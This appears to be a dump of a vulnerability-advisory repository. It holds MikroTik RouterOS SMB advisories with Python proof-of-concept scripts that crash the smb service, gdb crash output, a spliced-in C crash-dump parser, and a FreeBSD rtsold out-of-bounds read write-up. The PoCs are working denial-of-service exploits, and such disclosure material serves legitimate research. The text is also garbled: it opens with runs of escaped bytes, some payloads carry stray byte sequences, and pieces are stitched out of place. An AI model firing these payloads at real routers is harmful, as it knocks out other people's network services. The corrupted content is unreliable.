e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xb
f\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff?\xe1\x9a\x80\x00\x01\x0e\xe2\x7f\x87\xf3\xa0\x81\xb7\xfe\x1b\x00\x00\x00\x00\xb7\xfe\x1b\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\xa0\x81\xb5\x00\x00\x00\x00\x00\x00\x00\x00$\xc0\x80\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xd1\xc5\x81\xc2\xec\x88\xf3\xa0\xa0\x80\xb1\xea\x11\x83\xce4\x17\xeb\xc5\x0c{p\x00\x00\x00\x04\x00\xe2\
x80\x88\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x0e\xfe\xff\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\xd4\xfa\xbc^\xc5g\xf3\xa0\x81\xb7\x8a9\xeaP\xe6\xa0(\x13\xc7\xa9\xa9@\xf4\x1b\x0f\xc3\xe3\x98\x89\xc54\x1e\xb4134h\xea\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x05\x00\x1e\x00\x00\x00\x00\x001\x00340282366920938463463374607431778211447\x002\x00.\x001\x006\x008\x00.\x002\x000\x000\x00.\x001\x005\x002\x00' 8 | 9 | send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | send_socket.connect((host, port)) 11 | send_socket.send(payload) 12 | 13 | 14 | if __name__ == "__main__": 15 | if len(sys.argv) != 3: 16 | print "Usage: python poc.py " 17 | sys.exit() 18 | 19 | host = sys.argv[1] 20 | port = int(sys.argv[2]) 21 | vul_smb_1(host, port) 22 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_2/README.md: -------------------------------------------------------------------------------- 1 | ### vul_smb_2 2 | 3 | #### Description 4 | 5 | The `smb` process suffers from a memory corruption vulnerability. By sending a crafted packet, an unauthenticated remote user can crash the `smb` process due to invalid memory access. 6 | 7 | > In default, the `smb` service is disabled. 8 | 9 | #### Reproduce 10 | 11 | ```shell 12 | $ python poc.py 13 | ``` 14 | #### Affected Version 15 | 16 | This vulnerability was found in stable `6.44.2`, and was fixed since stable `6.44.3`. 
17 | 18 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_2/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import socket 4 | 5 | 6 | def vul_smb_2(host, port=445): 7 | payload = '\x00\x00\x00\xee\xfeSMB@\x00\x01\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xd1\xc5\x81\xc2\xec\x88\xea\x11\x83\xce4\x17\xeb\xc5\x0c{p\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\xf3\xa0\x80\xa5\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00\xf3\xa0\x81\x8b&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\xd4\xfa\xbc\xe0\xb9\x83^\xc5g\x8a9\xeaP\xe6\xa0(\x13\xc7\xa9\xa9@\xf40\x0f\xc3\xe3\x98\x89\xc54\x1e\xb46h\xea\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\xe2\x02\x00\x01\x00\x00\x00\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\xe2\x80\x81\x00\x00\x00\xf3\xa0\x81\xa4\x05\x00\x1e\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x000\x000\x00.\x0032770\x005\x0032767\x00' 8 | 9 | send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | send_socket.connect((host, port)) 11 | send_socket.send(payload) 12 | 13 | 14 | if __name__ == "__main__": 15 | if len(sys.argv) != 3: 16 | print "Usage: python poc.py " 17 | sys.exit() 18 | 19 | host = sys.argv[1] 20 | port = int(sys.argv[2]) 21 | vul_smb_2(host, port) 22 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_3/README.md: -------------------------------------------------------------------------------- 1 | ### vul_smb_3 2 | 3 | #### Description 4 | 5 | The `smb` 
process suffers from a memory corruption vulnerability. By sending a crafted packet, an unauthenticated remote user can crash the `smb` process due to invalid memory access.

> By default, the `smb` service is disabled.

Against stable `6.46.5`, the poc resulted in the following crash, captured with `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x806bffd:   mov    edx,DWORD PTR [eax]
   0x806bfff:   push   ebx
   0x806c000:   push   DWORD PTR [ebp-0x12c]
   0x806c006:   push   DWORD PTR [ebp-0x120]
0x0806bffd in ?? ()
(gdb) i r
eax            0x0                 0
ecx            0x77727f00          2003992320
edx            0x1                 1
ebx            0x7ffca9e0          2147264992
esp            0x7ffca960          0x7ffca960
ebp            0x7ffcaaa8          0x7ffcaaa8
esi            0x7ffca9f8          2147265016
edi            0x0                 0
eip            0x806bffd           0x806bffd
eflags         0x10206             [ PF IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 181       target:/nova/bin/smb
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.18-19:33:09.94@0:
2020.06.18-19:33:09.94@0:
2020.06.18-19:33:09.94@0: /nova/bin/smb
2020.06.18-19:33:09.94@0: --- signal=11 --------------------------------------------
2020.06.18-19:33:09.94@0:
2020.06.18-19:33:09.94@0: eip=0x0806bffd eflags=0x00010206
2020.06.18-19:33:09.94@0: edi=0x00000000 esi=0x7ffca9f8 ebp=0x7ffcaaa8 esp=0x7ffca960
2020.06.18-19:33:09.94@0: eax=0x00000000 ebx=0x7ffca9e0 ecx=0x77727f00 edx=0x00000001
2020.06.18-19:33:09.94@0:
2020.06.18-19:33:09.94@0: maps:
2020.06.18-19:33:09.94@0: 08048000-08071000 r-xp 00000000 00:0c 1053 /nova/bin/smb
2020.06.18-19:33:09.94@0: 776f0000-77725000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.18-19:33:09.94@0: 77729000-77743000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.18-19:33:09.94@0: 77744000-77753000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.18-19:33:09.94@0: 77754000-77771000 r-xp 00000000 00:0c 947 /lib/libucrypto.so
2020.06.18-19:33:09.94@0: 77772000-777be000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.18-19:33:09.94@0: 777c1000-777c9000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.18-19:33:09.94@0: 777cd000-777d4000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.18-19:33:09.94@0:
2020.06.18-19:33:09.94@0: stack: 0x7ffcb000 - 0x7ffca960
2020.06.18-19:33:09.94@0: e0 a9 fc 7f 88 aa fc 7f 0e 73 07 08 a0 73 07 08 01 00 00 00 0e 73 07 08 91 00 00 00 00 00 00 00
2020.06.18-19:33:09.94@0: 26 eb 71 77 00 60 72 77 00 00 00 00 21 ec 71 77 4e 54 4c 4d 53 53 50 00 d8 a9 fc 7f 4d 98 71 77
2020.06.18-19:33:09.94@0:
2020.06.18-19:33:09.94@0: code: 0x806bffd
2020.06.18-19:33:09.94@0: 8b 10 53 ff b5 d4 fe ff ff ff b5 e0 fe ff ff 50
```

#### Reproduce

```shell
$ python poc.py
```

#### Affected Version

This vulnerability was initially found in stable `6.44.3`, and was fixed in stable `6.47`.
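Triage of a RouterOS crash dump such as the `backtrace.log` above starts with mapping `eip` and the `backtrace:` addresses onto the `maps:` lines, which gives the module and the offset to open in a disassembler. The C below is an added example, not part of this repository, that does that mapping; the sample lines are copied from the vul_hotspot_2 dump earlier on this page (which also carries a `backtrace:` line), and `struct crash_dump`, `parse_dump_line`, `resolve_addr`, `resolve_frames` and `sample_dump` are names of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_MAPS   32
#define MAX_FRAMES 32

struct mapping { unsigned long start, end; char path[128]; };
struct frame   { unsigned long addr; int map; unsigned long offset; };
struct crash_dump {
    int signal, nmaps, nframes; unsigned long eip;
    struct mapping maps[MAX_MAPS]; struct frame frames[MAX_FRAMES];
};

/* Constructed sample input: a subset of the lines of the vul_hotspot_2 dump above. */
static const char *const SAMPLE_LINES[] = {
    "2022.10.31-15:15:36.78@0: /ram/pckg/hotspot/nova/bin/hotspot",
    "2022.10.31-15:15:36.78@0: --- signal=6 --------------------------------------------",
    "2022.10.31-15:15:36.78@0: eip=0x7767e55b eflags=0x00000246",
    "2022.10.31-15:15:36.78@0: 08048000-08078000 r-xp 00000000 00:12 34 /ram/pckg/hotspot/nova/bin/hotspot",
    "2022.10.31-15:15:36.78@0: 77650000-77685000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so",
    "2022.10.31-15:15:36.78@0: 776d9000-77725000 r-xp 00000000 00:0c 946 /lib/libumsg.so",
    "2022.10.31-15:15:36.78@0: 77728000-77730000 r-xp 00000000 00:0c 950 /lib/libubox.so",
    "2022.10.31-15:15:36.78@0: backtrace: 0x7767e55b 0x7767a077 0x77704ad3 0x7772c9a5 0x0804f7ed",
};

/* Feed one line; returns 1 when it contributed a map, the signal, eip or frames. */
int parse_dump_line(struct crash_dump *d, const char *line)
{
    const char *sp = strchr(line, ' ');          /* skip the "date-time@cpu:" stamp */
    const char *body = sp ? sp + 1 : line;
    unsigned long s, e; char path[128];
    /* "08048000-08078000 r-xp 00000000 00:12 34 /ram/pckg/hotspot/nova/bin/hotspot" */
    if (sscanf(body, "%lx-%lx %*s %*s %*s %*s %127s", &s, &e, path) == 3) {
        if (d->nmaps >= MAX_MAPS) return 0;
        d->maps[d->nmaps].start = s;
        d->maps[d->nmaps].end = e;
        strcpy(d->maps[d->nmaps++].path, path);
        return 1;
    }
    if (sscanf(body, "--- signal=%d", &d->signal) == 1 || sscanf(body, "eip=%lx", &d->eip) == 1)
        return 1;
    if (strncmp(body, "backtrace:", 10) == 0) {  /* space-separated 0x... words */
        const char *p = body + 10; char *endp;
        while (d->nframes < MAX_FRAMES) {
            unsigned long a = strtoul(p, &endp, 16);
            if (endp == p) break;
            d->frames[d->nframes++].addr = a;
            p = endp;
        }
        return 1;
    }
    return 0;
}

/* Map an address to the index of the module containing it (or -1) and to its
 * offset inside that module, which is what to feed to the disassembler. */
int resolve_addr(const struct crash_dump *d, unsigned long addr, unsigned long *offset)
{
    for (int m = 0; m < d->nmaps; m++)
        if (addr >= d->maps[m].start && addr < d->maps[m].end) {
            *offset = addr - d->maps[m].start;
            return m;
        }
    return -1;
}

/* Resolve every backtrace frame; returns how many fell inside a known map. */
int resolve_frames(struct crash_dump *d)
{
    int resolved = 0;
    for (int i = 0; i < d->nframes; i++)
        if ((d->frames[i].map = resolve_addr(d, d->frames[i].addr, &d->frames[i].offset)) >= 0)
            resolved++;
    return resolved;
}

/* The sample lines, parsed and resolved once (a real tool would fgets() them). */
const struct crash_dump *sample_dump(void)
{
    static struct crash_dump d;
    static int ready;
    if (!ready) {
        for (size_t i = 0; i < sizeof SAMPLE_LINES / sizeof SAMPLE_LINES[0]; i++)
            parse_dump_line(&d, SAMPLE_LINES[i]);
        resolve_frames(&d);
        ready = 1;
    }
    return &d;
}

int main(void)
{
    const struct crash_dump *d = sample_dump();
    for (int i = 0; i < d->nframes; i++)
        printf("#%d 0x%08lx %s+0x%lx\n", i, d->frames[i].addr,
               d->frames[i].map >= 0 ? d->maps[d->frames[i].map].path : "?", d->frames[i].offset);
    return 0;
}
```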
82 | 83 | #### Timeline 84 | 85 | + 2020/05/12 - report the vulnerability to the vendor 86 | + 2020/05/13 - vendor confirms the vulnerability and says that it has been fixed in the latest beta (unreleased) 87 | + 2020/06/02 - vendor fix it in stable `6.47` -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_3/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import socket 4 | 5 | 6 | def vul_smb_3(host, port=445): 7 | send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | send_socket.connect((host, port)) 9 | 10 | packet_negotiate_request = "\x00\x00\x00\xee\xfe\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00" \ 11 | "\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 12 | "\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 13 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 14 | "\x00\x00\x00\x00\x24\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00" \ 15 | "\xd1\xc5\x81\xc2\xec\x88\xea\x11\x83\xce\x34\x17\xeb\xc5\x0c\x7b" \ 16 | "\x70\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03" \ 17 | "\x11\x03\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00" \ 18 | "\x01\x00\xd4\xfa\xbc\x5e\xc5\x67\x8a\x39\xea\x50\xe6\xa0\x28\x13" \ 19 | "\xc7\xa9\xa9\x40\xf4\x30\x0f\xc3\xe3\x98\x89\xc5\x34\x1e\xb4\x36" \ 20 | "\x68\xea\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x02\x00" \ 21 | "\x01\x00\x00\x00\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00" \ 22 | "\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x05\x00\x1e\x00" \ 23 | "\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00" \ 24 | "\x38\x00\x2e\x00\x32\x00\x30\x00\x30\x00\x2e\x00\x31\x00\x35\x00" \ 25 | "\x32\x00" 26 | 27 | send_socket.send(packet_negotiate_request) 28 | send_socket.recv(1024) 29 | 30 | packet_session_setup_request = 
"\x00\x00\x00\xa2\xfe\x53\x4d\x42\x40\x00\x01\x00\x00\x00" \ 31 | "\x00\x00\x01\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" \ 32 | "\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00" \ 33 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 34 | "\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00" \ 35 | "\x00\x00\x58\x00\x4a\x00\x12\x00\x00\x00\x01\x00\x00\x00\x60\x48" \ 36 | "\x06\x06\x2b\x06\x01\x05\x05\x02\xa1\x3e\x2d\x33\x35\x35\x31\x37" \ 37 | "\x33\x31\x33\x38\x38\x39\x38\x38\x36\x32\x31\x34\x39\x30\x35\x35" \ 38 | "\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x32\x35\x36" \ 39 | "\x32\x31\x34\x39\x30\x35\x35\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06" \ 40 | "\x01\x04\x01\x82\x39\x32\x32\x33\x33\x37\x32\x31\x33\x36\x38\x35" \ 41 | "\x34\x37\x37\x35\x38\x30\x39\x02\x02\x0a\xa2\x2a\x33\x33\x37\x32" \ 42 | "\x31\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30\x39\x02\x02\x0a\xa2" \ 43 | "\x2a\x33\x33\x37\x32\x31\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30" \ 44 | "\x39\x02\x02\x0a\xa2\x2a\x33\x33\x37\x32\x31\x33\x36\x38\x35\x34" \ 45 | "\x37\x37\x35\x38\x30\x39\x02\x02\x0a\xa2\x2a\x33\x33\x37\x32\x31" \ 46 | "\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30\x39\x02\x02\x0a\xa2\x2a" \ 47 | "\x33\x33\x37\x32\x31\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30\x39" \ 48 | "\x02\x02\x0a\xa2\x2a\x33\x33\x37\x32\x31\x33\x36\x38\x35\x34\x37" \ 49 | "\x37\x35\x38\x30\x39\x02\x02\x0a\xa2\x2a\x37\x33\x31\x33\x38\x38" \ 50 | "\x39\x38\x38\x36\x32\x31\x34\x39\x30\x35\x35\x3c\xa0\x0e\x30\x0c" \ 51 | "\x06\x0a\x2b\x06\x01\x04\x01\x82\x39\x32\x32\x33\x33\x37\x32\x30" \ 52 | "\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30\x3a\x02\x02\x0b\xa2\x2a" \ 53 | "\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82" \ 54 | "\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 55 | "\x00\x00\x0a\x00\xba\x48\x00\x00\x00\x0f" 56 | 57 | send_socket.send(packet_session_setup_request) 58 | 59 | 60 | if __name__ == "__main__": 61 | if 
len(sys.argv) != 3:
        print "Usage: python poc.py "
        sys.exit()

    host = sys.argv[1]
    port = int(sys.argv[2])
    vul_smb_3(host, port)

--------------------------------------------------------------------------------
/advisory/Other/freebsd_rtsold_out_of_bounds_read/README.md:
--------------------------------------------------------------------------------
## FreeBSD rtsold Out of Bounds Read Vulnerability

On January 28th, 2021, Quarkslab published a blog post, "[Bad Neighbor on FreeBSD: IPv6 Router Advertisement Vulnerabilities in rtsold (CVE-2020-25577)](https://blog.quarkslab.com/bad-neighbor-on-freebsd-ipv6-router-advertisement-vulnerabilities-in-rtsold-cve-2020-25577.html)", which detailed 4 vulnerabilities found in the IPv6 stack of FreeBSD, more specifically in `rtsold(8)`, the router solicitation daemon. After reading it, I took a look at `rtsold` and found another out-of-bounds read vulnerability.

### Description

The function `rtsol_input()` in `usr.sbin/rtsold/rtsol.c` loops through the options included in a `Router Advertisement` message. One of the supported option types is called `Recursive DNS Server`, or `RDNSS` for short. The `RDNSS` option is composed of 4 fixed fields (`Type`, `Length`, `Reserved` and `Lifetime`), followed by a variable number of IPv6 addresses of recursive DNS servers. In general, the option's size in bytes is an odd multiple of 8, so the `Length` field (counted in 8-byte units) is odd.

When dealing with an `RDNSS` option, the routine goes to line 364. At line 376, the `addr` pointer is set to point past the 4 fixed fields of the `RDNSS` option, that is, to the beginning of the variable number of IPv6 addresses included in the option. Then, at line 377, it loops over the IPv6 addresses in the `RDNSS` option, reading a 16-byte IPv6 address from the option data at each iteration, as long as the `addr` pointer has not reached the end of the option, which is calculated using the `RA_OPT_NEXT_HDR` macro.
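The option walk just described, as an added C model that is not rtsold's code: it keeps rtsold's `RA_OPT_NEXT_HDR` arithmetic and the RFC 6106 minimum-length check, and adds the check the address loop at line 377 relies on, namely that an RDNSS payload must be a whole number of 16-byte addresses, which makes an odd `Length` the only valid shape. All option buffers are constructed; `build_rdnss`, `check_rdnss_len` and `check_mtu_then_rdnss` are helpers of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define ND_OPT_RDNSS  25
#define RDNSS_HDR_LEN 8    /* Type, Length, Reserved (2) and Lifetime (4) */
#define IN6_ADDR_LEN  16

struct nd_opt_hdr { uint8_t nd_opt_type; uint8_t nd_opt_len; };

/* The same arithmetic as rtsold's RA_OPT_NEXT_HDR(x): length is in 8-byte units. */
static const char *ra_opt_next_hdr(const char *x)
{
    return x + ((const struct nd_opt_hdr *)x)->nd_opt_len * 8;
}

enum rdnss_status {
    RDNSS_OK,         /* RDNSS found; *naddrs holds its address count */
    RDNSS_TOO_SHORT,  /* nd_opt_len < 3, the RFC 6106 section 5.3.1 minimum */
    RDNSS_EVEN_LEN,   /* payload is not a whole number of 16-byte addresses */
    RDNSS_NOT_FOUND,  /* all options walked, no RDNSS among them */
    RA_BAD_OPTION     /* zero length, or an option running past the message */
};

/* Walk the RA options in buf[0..len) and count the addresses of the first
 * RDNSS option, refusing any length the address loop would overread. */
enum rdnss_status count_rdnss_addrs(const uint8_t *buf, size_t len, size_t *naddrs)
{
    const char *raoptp = (const char *)buf;
    const char *end = raoptp + len;

    *naddrs = 0;
    while (raoptp < end) {
        const struct nd_opt_hdr *ndo = (const struct nd_opt_hdr *)raoptp;
        if ((size_t)(end - raoptp) < sizeof *ndo || ndo->nd_opt_len == 0)
            return RA_BAD_OPTION;                   /* "invalid option length 0." */
        if (ra_opt_next_hdr(raoptp) > end)
            return RA_BAD_OPTION;                   /* "option length overflow." */
        if (ndo->nd_opt_type == ND_OPT_RDNSS) {
            const char *addr = raoptp + RDNSS_HDR_LEN;
            const char *opt_end = ra_opt_next_hdr(raoptp);
            if (ndo->nd_opt_len < 3)
                return RDNSS_TOO_SHORT;
            /* 8 header bytes + n * 16 address bytes is 8 * (1 + 2n) bytes, so
             * nd_opt_len must be odd. An even value (the advisory's Length=4)
             * leaves 8 trailing bytes from which `addr < opt_end` alone would
             * still read a full 16-byte address. */
            if (ndo->nd_opt_len % 2 == 0)
                return RDNSS_EVEN_LEN;
            while ((size_t)(opt_end - addr) >= IN6_ADDR_LEN) { /* whole addresses only */
                (*naddrs)++;
                addr += IN6_ADDR_LEN;
            }
            return RDNSS_OK;
        }
        raoptp = ra_opt_next_hdr(raoptp);
    }
    return RDNSS_NOT_FOUND;
}

/* Build an RDNSS option of nd_opt_len units (1..8) into out (64 bytes), with
 * the address bytes filled with 'A'. Returns bytes written, 0 on a bad length. */
size_t build_rdnss(uint8_t *out, uint8_t nd_opt_len)
{
    size_t size = (size_t)nd_opt_len * 8;
    if (nd_opt_len < 1 || nd_opt_len > 8)
        return 0;
    out[0] = ND_OPT_RDNSS;
    out[1] = nd_opt_len;
    out[2] = out[3] = 0;               /* Reserved */
    memset(out + 4, 0xff, 4);          /* Lifetime */
    memset(out + 8, 'A', size - 8);    /* address bytes */
    return size;
}

/* Constructed case: a lone RDNSS option with the given Length. */
enum rdnss_status check_rdnss_len(uint8_t nd_opt_len, size_t *naddrs)
{
    uint8_t buf[64];
    size_t n = build_rdnss(buf, nd_opt_len);
    return count_rdnss_addrs(buf, n, naddrs);
}

/* Constructed case: an 8-byte MTU option (type 5, Length 1, MTU 1500) followed
 * by an RDNSS option with two addresses, with `cut` bytes truncated at the end. */
enum rdnss_status check_mtu_then_rdnss(size_t cut, size_t *naddrs)
{
    uint8_t buf[8 + 64] = { 5, 1, 0, 0, 0, 0, 0x05, 0xdc };
    size_t n = 8 + build_rdnss(buf + 8, 5);
    return count_rdnss_addrs(buf, n > cut ? n - cut : 0, naddrs);
}
```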
10 | 11 | However, if we craft a `ND_OPT_RDNSS` option with `Length=4` (even multiple of 8), when the routine go to line 378 again, it will read 16-byte address from the option data, but there is only 8-byte available. As a result, out-of-bounds read will occur. 12 | 13 | ```c 14 | 157 void 15 | 158 rtsol_input(int sock) 16 | 159 { 17 | [...] 18 | 339 19 | 340 #define RA_OPT_NEXT_HDR(x) (struct nd_opt_hdr *)((char *)(x) + \ 20 | 341 (((struct nd_opt_hdr *)(x))->nd_opt_len * 8)) 21 | 342 /* Process RA options. */ 22 | 343 warnmsg(LOG_DEBUG, __func__, "Processing RA"); 23 | 344 raoptp = (char *)icp + sizeof(struct nd_router_advert); 24 | 345 while (raoptp < (char *)icp + msglen) { 25 | 346 ndo = (struct nd_opt_hdr *)raoptp; 26 | [...] 27 | 352 28 | 353 if (ndo->nd_opt_len == 0) { 29 | 354 warnmsg(LOG_INFO, __func__, "invalid option length 0."); 30 | 355 break; 31 | 356 } 32 | 357 if ((char *)RA_OPT_NEXT_HDR(raoptp) > (char *)icp + msglen) { 33 | 358 warnmsg(LOG_INFO, __func__, "option length overflow."); 34 | 359 break; 35 | 360 } 36 | 361 37 | 362 switch (ndo->nd_opt_type) { 38 | 363 case ND_OPT_RDNSS: 39 | 364 rdnss = (struct nd_opt_rdnss *)raoptp; 40 | 365 41 | 366 /* Optlen sanity check (Section 5.3.1 in RFC 6106) */ 42 | 367 if (rdnss->nd_opt_rdnss_len < 3) { 43 | 368 warnmsg(LOG_INFO, __func__, 44 | 369 "too short RDNSS option" 45 | 370 "in RA from %s was ignored.", 46 | 371 inet_ntop(AF_INET6, &from.sin6_addr, 47 | 372 ntopbuf, sizeof(ntopbuf))); 48 | 373 break; 49 | 374 } 50 | 375 51 | 376 addr = (struct in6_addr *)(void *)(raoptp + sizeof(*rdnss)); 52 | 377 while ((char *)addr < (char *)RA_OPT_NEXT_HDR(raoptp)) { 53 | 378 if (inet_ntop(AF_INET6, addr, ntopbuf, 54 | 379 